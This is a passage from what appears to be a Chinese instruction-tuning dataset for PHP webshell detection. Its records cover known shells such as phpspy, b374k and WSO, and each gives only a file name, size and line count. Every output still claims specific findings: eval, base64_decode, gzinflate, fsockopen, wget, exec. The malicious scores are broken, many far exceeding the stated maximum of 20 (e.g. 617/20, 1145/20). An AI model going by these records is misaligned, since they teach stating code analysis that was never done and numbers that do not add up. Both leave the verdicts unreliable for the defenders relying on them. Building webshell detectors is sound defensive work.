"0385a185f77b0729a00ac2407263e2f5"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"bat_b4tm4n.php\", \"文件类型\": \"php\", \"文件大小\": \"129707 bytes\", \"行数\": 3962}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, $_REQUEST[, file_get_contents(, fwrite(, $_POST[ 发现混淆技术: ord\\s*\\(, chr\\s*\\(, base64_decode 包含网络功能: fsockopen, socket_create, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 617/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/bat_b4tm4n.php", "malicious_score": 617, "md5_hash": "2e89498399e6276eabc932d90a8f542e"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"array_intersect_ukey-cookie-ass.php\", \"文件类型\": \"php\", \"文件大小\": \"193 bytes\", \"行数\": 9}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_COOKIE[, $_REQUEST[ 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/array_intersect_ukey-cookie-ass.php", "malicious_score": 6, "md5_hash": "e37bae567b320664192c860cbd9f4e68"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"conflg1.php\", \"文件类型\": \"php\", \"文件大小\": \"36951 bytes\", \"行数\": 7}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: eval(, base64_decode( 发现混淆技术: base64_decode 恶意度评分: 8/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/conflg1.php", "malicious_score": 8, "md5_hash": "7b9b2c922f447cf57792d482349805bd"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"404.php\", \"文件类型\": \"php\", \"文件大小\": \"15005 bytes\", \"行数\": 38}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, gzinflate(, eval(, base64_decode( 发现混淆技术: base64_decode, gzinflate 恶意度评分: 16/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/404.php", "malicious_score": 16, "md5_hash": "ced050df5ca42064056a7ad610a191b3"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"bat.php\", \"文件类型\": \"php\", \"文件大小\": \"129399 bytes\", \"行数\": 3876}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, $_REQUEST[, file_get_contents(, fwrite(, $_POST[ 发现混淆技术: ord\\s*\\(, chr\\s*\\(, base64_decode 包含网络功能: fsockopen, socket_create, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 626/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/bat.php", "malicious_score": 626, "md5_hash": "8841ac390ff149556bf47cbef842a79c"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"国外某论坛不含Get,Post的pHp一句话.php\", \"文件类型\": \"php\", \"文件大小\": \"47 bytes\", \"行数\": 1}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: str_rot13(, eval( 发现混淆技术: str_rot13 恶意度评分: 8/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/国外某论坛不含Get,Post的pHp一句话.php", "malicious_score": 8, "md5_hash": "20ede5b8182d952728d594e6f2bb5c76"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"system2022-08-22.php\", \"文件类型\": \"php\", \"文件大小\": \"807 bytes\", \"行数\": 24}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, $_GET[ 恶意度评分: 15/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/system2022-08-22.php", "malicious_score": 15, "md5_hash": "22f2223f56187549835e8b7f69476037"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"非常规的pHp一句话木马.php\", \"文件类型\": \"php\", \"文件大小\": \"411 bytes\", \"行数\": 17}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: preg_replace(\"/[errorpage]/e, $_REQUEST[, $_POST[, $_GET[ 恶意度评分: 15/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/非常规的pHp一句话木马.php", "malicious_score": 15, "md5_hash": "472e26dc05dd5dd1cc887136cb53a553"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"20220213_06.php\", \"文件类型\": \"php\", \"文件大小\": \"495 bytes\", \"行数\": 24}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: eval(, file_get_contents( 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/20220213_06.php", "malicious_score": 6, "md5_hash": "d09f545ab96690e7d66c740ec421a925"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"2022-08-26-01.php\", \"文件类型\": \"php\", \"文件大小\": \"36 bytes\", \"行数\": 1}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[ 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/2022-08-26-01.php", "malicious_score": 9, "md5_hash": "ee531f568b73b3cce62e274c00cfdb33"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"php1.php\", \"文件类型\": \"php\", \"文件大小\": \"74594 bytes\", \"行数\": 1465}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: gzinflate(, eval(, base64_decode( 发现混淆技术: base64_decode, gzinflate 恶意度评分: 13/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/php1.php", "malicious_score": 13, "md5_hash": "d539eefaf258fdf80652e503d4cfad3f"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"2013未加密.php\", \"文件类型\": \"php\", \"文件大小\": \"56734 bytes\", \"行数\": 1616}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, fwrite(, $_COOKIE[, fputs(, exec( 发现混淆技术: base64_decode 包含网络功能: wget, fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 61/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/phpspy/2013未加密.php", "malicious_score": 61, "md5_hash": "9bd9880089256dca5bf7e295961536ca"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"2009lite.php\", \"文件类型\": \"php\", \"文件大小\": \"37825 bytes\", \"行数\": 1165}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, $_COOKIE[, exec(, system(, passthru( 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 38/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/phpspy/2009lite.php", "malicious_score": 38, "md5_hash": "5e1dad76efd525671893ac471f58d016"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"phpspy2010.php\", \"文件类型\": \"php\", \"文件大小\": \"34715 bytes\", \"行数\": 21}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: gzinflate(, eval(, base64_decode( 发现混淆技术: base64_decode, gzinflate 恶意度评分: 13/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/phpspy/phpspy2010.php", "malicious_score": 13, "md5_hash": "719ce37133c4a4637d33f59d56175cab"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"2013加密.php\", \"文件类型\": \"php\", \"文件大小\": \"23327 bytes\", \"行数\": 7}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: gzinflate(, eval(, base64_decode( 发现混淆技术: base64_decode, gzinflate 恶意度评分: 13/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/phpspy/2013加密.php", "malicious_score": 13, "md5_hash": "a89a639b05fb210af6e2b0914cc1a8d2"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"2011.php\", \"文件类型\": \"php\", \"文件大小\": \"74895 bytes\", \"行数\": 2141}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, fwrite(, $_COOKIE[, fputs(, exec( 发现混淆技术: base64_decode, ord\\s*\\( 包含网络功能: wget, fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 92/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/phpspy/2011.php", "malicious_score": 92, "md5_hash": "a03f5c4121a904ca7c1d83f845bbec31"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"2008.php\", \"文件类型\": \"php\", \"文件大小\": \"66983 bytes\", \"行数\": 1990}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, $_COOKIE[, fputs(, exec(, system( 发现混淆技术: base64_decode, pack\\s*\\(, ord\\s*\\( 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 74/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/phpspy/2008.php", "malicious_score": 74, "md5_hash": "f8e5076e734f30b8b30ef0e933a85498"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"phpspy_2006.php\", \"文件类型\": \"php\", \"文件大小\": \"46854 bytes\", \"行数\": 1309}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, $_GET[, fwrite(, $_COOKIE[, $_POST[ 发现混淆技术: pack\\s*\\( 包含网络功能: fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 407/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/phpspy/phpspy_2006.php", "malicious_score": 407, "md5_hash": "acfbe95bd44dcc2b17b68063e35eb08f"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"2009mssql.php\", \"文件类型\": \"php\", \"文件大小\": \"94172 bytes\", \"行数\": 2723}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, fwrite(, $_COOKIE[, fputs(, exec( 发现混淆技术: base64_decode, pack\\s*\\(, ord\\s*\\( 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 95/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/phpspy/2009mssql.php", "malicious_score": 95, "md5_hash": "fa49ae1e5a20738d8fc82b4462166142"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"phpspy_2005_full.php\", \"文件类型\": \"php\", \"文件大小\": \"38882 bytes\", \"行数\": 1211}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, fwrite(, $_COOKIE[, $_POST[, exec( 发现混淆技术: pack\\s*\\( 包含网络功能: fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 146/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/phpspy/phpspy_2005_full.php", "malicious_score": 146, "md5_hash": "0561bd20b177c754fc55763ca7c42acb"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"2014phpspy.php\", \"文件类型\": \"php\", \"文件大小\": \"23749 bytes\", \"行数\": 7}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: gzinflate(, eval(, base64_decode( 发现混淆技术: base64_decode, gzinflate 恶意度评分: 13/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/phpspy/2014phpspy.php", "malicious_score": 13, "md5_hash": "9204d55a91c95a3965e138e7960e4b1f"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"phpspy_2005_lite.php\", \"文件类型\": \"php\", \"文件大小\": \"20551 bytes\", \"行数\": 659}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, fwrite(, $_COOKIE[, $_POST[, exec( 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 104/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/phpspy/phpspy_2005_lite.php", "malicious_score": 104, "md5_hash": "6d3b55f58daa66179f1cdd67cd791b6d"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"b374k-2.2.poly.php\", \"文件类型\": \"php\", \"文件大小\": \"51543 bytes\", \"行数\": 4}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: gzinflate(, eval(, base64_decode( 发现混淆技术: base64_decode, gzinflate 恶意度评分: 13/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/b374k/b374k-2.2.poly.php", "malicious_score": 13, "md5_hash": "d7b955b73a3d24c39d43ceb0b597f87d"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"b374k-3.2.2.php\", \"文件类型\": \"php\", \"文件大小\": \"222039 bytes\", \"行数\": 4535}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: gzinflate(, fwrite(, $_COOKIE[, exec(, system( 发现混淆技术: base64_decode, gzinflate, ord\\s*\\( 包含网络功能: wget, fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 64/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/b374k/b374k-3.2.2.php", "malicious_score": 64, "md5_hash": "48ca18a25424a0f52276290b619a7a83"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"b374k-2.2.min.php\", \"文件类型\": \"php\", \"文件大小\": \"31218 bytes\", \"行数\": 274}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: eval( 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/b374k/b374k-2.2.min.php", "malicious_score": 6, "md5_hash": "0723362e176328b2e98e99ac6cc17884"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"b374k-3.2.3.php\", \"文件类型\": \"php\", \"文件大小\": \"223978 bytes\", \"行数\": 4583}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: gzinflate(, fwrite(, $_COOKIE[, exec(, system( 发现混淆技术: base64_decode, gzinflate, ord\\s*\\( 包含网络功能: wget, fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 64/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/b374k/b374k-3.2.3.php", "malicious_score": 64, "md5_hash": "c6a7ebafdbe239d65248e2b69b670157"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"b374k-2.4.php\", \"文件类型\": \"php\", \"文件大小\": \"101330 bytes\", \"行数\": 2273}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, $_REQUEST[, gzinflate(, file_get_contents(, fwrite( 发现混淆技术: base64_decode, gzinflate, ord\\s*\\( 包含网络功能: wget 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 567/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/b374k/source/b374k-2.4.php", "malicious_score": 567, "md5_hash": "90208b0d9682a2e0adf2a5c017c2cf88"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"b374k-2.6.source.php\", \"文件类型\": \"php\", \"文件大小\": \"137851 bytes\", \"行数\": 2884}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, $_REQUEST[, gzinflate(, file_get_contents(, fwrite( 发现混淆技术: base64_decode, gzinflate, ord\\s*\\( 包含网络功能: wget 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 763/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/b374k/source/b374k-2.6.source.php", "malicious_score": 763, "md5_hash": "c8b244a825e1d049b07a661536558e47"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"b374k-2.7.source.php\", \"文件类型\": \"php\", \"文件大小\": \"137137 bytes\", \"行数\": 2900}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, gzinflate(, file_get_contents(, fwrite(, $_COOKIE[ 发现混淆技术: base64_decode, gzinflate, ord\\s*\\( 包含网络功能: wget 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 244/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/b374k/source/b374k-2.7.source.php", "malicious_score": 244, "md5_hash": "9ad34b44993ec691db1a5edb58ca4cd8"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"b374k-3.2.2.php\", \"文件类型\": \"php\", \"文件大小\": \"222039 bytes\", \"行数\": 4535}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: gzinflate(, fwrite(, $_COOKIE[, exec(, system( 发现混淆技术: base64_decode, gzinflate, ord\\s*\\( 包含网络功能: wget, fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 64/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/b374k/source/b374k-3.2.2.php", "malicious_score": 64, "md5_hash": "48ca18a25424a0f52276290b619a7a83"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"b374k-2.2.php\", \"文件类型\": \"php\", \"文件大小\": \"80992 bytes\", \"行数\": 1627}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, gzinflate(, file_get_contents(, fwrite(, $_COOKIE[ 发现混淆技术: base64_decode, gzinflate 包含网络功能: wget, fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 695/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/b374k/source/b374k-2.2.php", "malicious_score": 695, "md5_hash": "1606bdac2cb613bf0b8a22690364fbc5"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"b374k-2.8.source.php\", \"文件类型\": \"php\", \"文件大小\": \"170854 bytes\", \"行数\": 2459}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, gzinflate(, file_get_contents(, fwrite(, $_COOKIE[ 发现混淆技术: base64_decode, gzinflate, ord\\s*\\( 包含网络功能: wget 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 229/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/b374k/source/b374k-2.8.source.php", "malicious_score": 229, "md5_hash": "bfbcf7566485a1e1d3627b093096aed2"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"b374k-2.5.source.php\", \"文件类型\": \"php\", \"文件大小\": \"117350 bytes\", \"行数\": 2500}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, $_REQUEST[, gzinflate(, file_get_contents(, fwrite( 发现混淆技术: base64_decode, gzinflate, ord\\s*\\( 包含网络功能: wget 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 643/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/b374k/source/b374k-2.5.source.php", "malicious_score": 643, "md5_hash": "9fa6e5899e9cc8a868dfdaa31e2d58a0"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"b374k-2.3.php\", \"文件类型\": \"php\", \"文件大小\": \"90788 bytes\", \"行数\": 1915}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, $_REQUEST[, gzinflate(, file_get_contents(, fwrite( 发现混淆技术: base64_decode, gzinflate, ord\\s*\\( 包含网络功能: wget 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 505/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/b374k/source/b374k-2.3.php", "malicious_score": 505, "md5_hash": "5931a716711cbd98ca0c24e7e64c05b0"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"memWebshell.php\", \"文件类型\": \"php\", \"文件大小\": \"385 bytes\", \"行数\": 13}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: eval(, file_get_contents( 具备文件操作能力: unlink\\s*\\( 恶意度评分: 7/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/MemShellForPHP/memWebshell.php", "malicious_score": 7, "md5_hash": "73d6ea56610d72c9398836f8beaaeba6"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"WSO_base64.php\", \"文件类型\": \"php\", \"文件大小\": \"84128 bytes\", \"行数\": 5}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: eval(, base64_decode( 发现混淆技术: base64_decode 恶意度评分: 8/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/wso/WSO_base64.php", "malicious_score": 8, "md5_hash": "72d1df71c41c6711ca5ba026c59ccb82"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"wso-4.2.0.php\", \"文件类型\": \"php\", \"文件大小\": \"88611 bytes\", \"行数\": 1624}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, file_get_contents(, fwrite(, $_COOKIE[, fputs( 发现混淆技术: base64_decode, hex2bin, ord\\s*\\( 包含网络功能: wget, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 1145/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/wso/wso-4.2.0.php", "malicious_score": 1145, "md5_hash": "11c9ca06fa172f4631821825c819d346"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"wso-4.1.3.php\", \"文件类型\": \"php\", \"文件大小\": \"77576 bytes\", \"行数\": 1627}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, file_get_contents(, fwrite(, $_COOKIE[, fputs( 发现混淆技术: base64_decode, hex2bin, ord\\s*\\( 包含网络功能: wget, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 1145/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/wso/wso-4.1.3.php", "malicious_score": 1145, "md5_hash": "565d7e3411a3b0a555387087cb2d1439"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"wso2.php\", \"文件类型\": \"php\", \"文件大小\": \"66108 bytes\", \"行数\": 1522}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, fwrite(, $_COOKIE[, $_POST[, exec( 发现混淆技术: base64_decode, hex2bin, ord\\s*\\( 包含网络功能: wget 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 955/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/wso/wso2.php", "malicious_score": 955, "md5_hash": "eda02ae6dd7d0fe841653f5e6a69d17e"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"wso.php\", \"文件类型\": \"php\", \"文件大小\": \"63057 bytes\", \"行数\": 1469}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, file_get_contents(, fwrite(, fputs(, exec( 发现混淆技术: base64_decode, hex2bin, ord\\s*\\( 包含网络功能: wget, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 737/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/wso/wso.php", "malicious_score": 737, "md5_hash": "0176c418103fe6acff9b0845429abb52"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"wso-4.2.2.php\", \"文件类型\": \"php\", \"文件大小\": \"77524 bytes\", \"行数\": 1619}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, file_get_contents(, fwrite(, $_COOKIE[, fputs( 发现混淆技术: base64_decode, hex2bin, ord\\s*\\( 包含网络功能: wget, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 1121/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/wso/wso-4.2.2.php", "malicious_score": 1121, "md5_hash": "2998de8b29315b51638a25eb0a1dc318"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"wso-4.2.5.php\", \"文件类型\": \"php\", \"文件大小\": \"79753 bytes\", \"行数\": 1634}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, file_get_contents(, fwrite(, $_COOKIE[, fputs( 发现混淆技术: base64_decode, hex2bin, ord\\s*\\( 包含网络功能: wget, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 